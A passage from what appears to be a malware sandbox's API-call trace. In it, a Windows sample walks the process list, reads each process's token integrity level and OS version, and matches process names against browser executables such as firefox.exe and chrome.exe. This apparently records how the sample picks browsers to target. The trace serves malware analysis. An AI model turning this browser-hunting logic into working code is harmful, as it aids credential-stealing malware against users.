TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.831] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.831] GetLastError () returned 0x7a [0224.831] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.831] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.831] CloseHandle (hObject=0x590) returned 1 [0224.831] CloseHandle (hObject=0x584) returned 1 [0224.831] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x584 [0224.831] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7688, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.831] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.831] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.831] GetLastError () returned 0x7a [0224.831] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.831] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.831] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.832] CloseHandle (hObject=0x590) returned 1 [0224.832] CloseHandle (hObject=0x584) returned 1 [0224.832] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0224.832] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0224.832] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0224.832] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0224.832] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0224.832] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0224.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x584 [0224.832] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.832] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.832] GetLastError () returned 0x7a [0224.832] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.832] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.832] CloseHandle (hObject=0x590) returned 1 [0224.832] CloseHandle (hObject=0x584) returned 1 [0224.832] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x584 [0224.832] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7798, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.832] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.832] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.833] GetLastError () returned 0x7a [0224.833] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.833] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.833] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.833] CloseHandle (hObject=0x590) returned 1 [0224.833] CloseHandle (hObject=0x584) returned 1 [0224.833] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0224.833] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0224.833] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0224.833] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0224.833] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0224.833] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0224.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x584 [0224.833] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.833] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.833] GetLastError () returned 0x7a [0224.833] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.833] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.833] CloseHandle (hObject=0x590) returned 1 [0224.833] CloseHandle (hObject=0x584) returned 1 [0224.833] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x584 [0224.834] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e78b8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.834] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.834] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.834] GetLastError () returned 0x7a [0224.834] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.834] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.834] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.834] CloseHandle (hObject=0x590) returned 1 [0224.834] CloseHandle (hObject=0x584) returned 1 [0224.834] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0224.834] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0224.834] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0224.834] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0224.834] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0224.834] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0224.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x584 [0224.834] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.834] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.834] GetLastError () returned 0x7a [0224.834] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.834] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.834] CloseHandle (hObject=0x590) returned 1 [0224.835] CloseHandle (hObject=0x584) returned 1 [0224.835] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x584 [0224.835] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e79f0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.835] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.835] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.835] GetLastError () returned 0x7a [0224.835] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.835] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.835] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.835] CloseHandle (hObject=0x590) returned 1 [0224.835] CloseHandle (hObject=0x584) returned 1 [0224.835] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0224.835] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0224.835] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0224.835] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0224.835] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0224.835] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0224.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x584 [0224.835] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.835] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.836] GetLastError () returned 0x7a [0224.836] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.836] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.836] CloseHandle (hObject=0x590) returned 1 [0224.836] CloseHandle (hObject=0x584) returned 1 [0224.836] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x584 [0224.836] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7b10, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.836] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.836] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.836] GetLastError () returned 0x7a [0224.836] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.836] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.836] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.836] CloseHandle (hObject=0x590) returned 1 [0224.836] CloseHandle (hObject=0x584) returned 1 [0224.836] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0224.836] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0224.836] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0224.836] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0224.836] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0224.836] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0224.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x584 [0224.837] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.837] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.837] GetLastError () returned 0x7a [0224.837] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.837] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.837] CloseHandle (hObject=0x590) returned 1 [0224.837] CloseHandle (hObject=0x584) returned 1 [0224.837] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x584 [0224.837] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e7c50, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.837] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.837] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.837] GetLastError () returned 0x7a [0224.837] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.837] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.837] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.837] CloseHandle (hObject=0x590) returned 1 [0224.837] CloseHandle (hObject=0x584) returned 1 [0224.837] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0224.837] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0224.837] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0224.837] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0224.837] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0224.837] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0224.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0224.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0224.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0224.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0224.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0224.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x584 [0224.838] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0224.838] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0224.838] GetLastError () returned 0x7a [0224.838] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0224.838] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0224.838] CloseHandle (hObject=0x590) returned 1 [0224.838] CloseHandle (hObject=0x584) returned 1 [0224.838] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0224.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x584 [0224.838] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e81e8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0224.838] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0224.838] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0224.838] GetLastError () returned 0x7a [0224.838] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0224.838] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0224.838] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0224.838] CloseHandle (hObject=0x590) returned 1 [0224.838] CloseHandle (hObject=0x584) returned 1 [0224.839] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0224.839] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0224.839] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0224.839] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0224.839] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0224.839] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0224.839] VirtualFree (lpAddress=0x2e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0224.839] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0226.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xc0a0) returned 0xc0000004 [0226.847] VirtualAlloc (lpAddress=0x0, dwSize=0xd0a0, flAllocationType=0x1000, flProtect=0x4) returned 0x340000 [0226.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x340000, Length=0xd0a0, ResultLength=0x0 | out: SystemInformation=0x340000, ResultLength=0x0) returned 0x0 [0226.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0226.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0226.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0226.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0226.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0226.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0226.850] OpenProcess 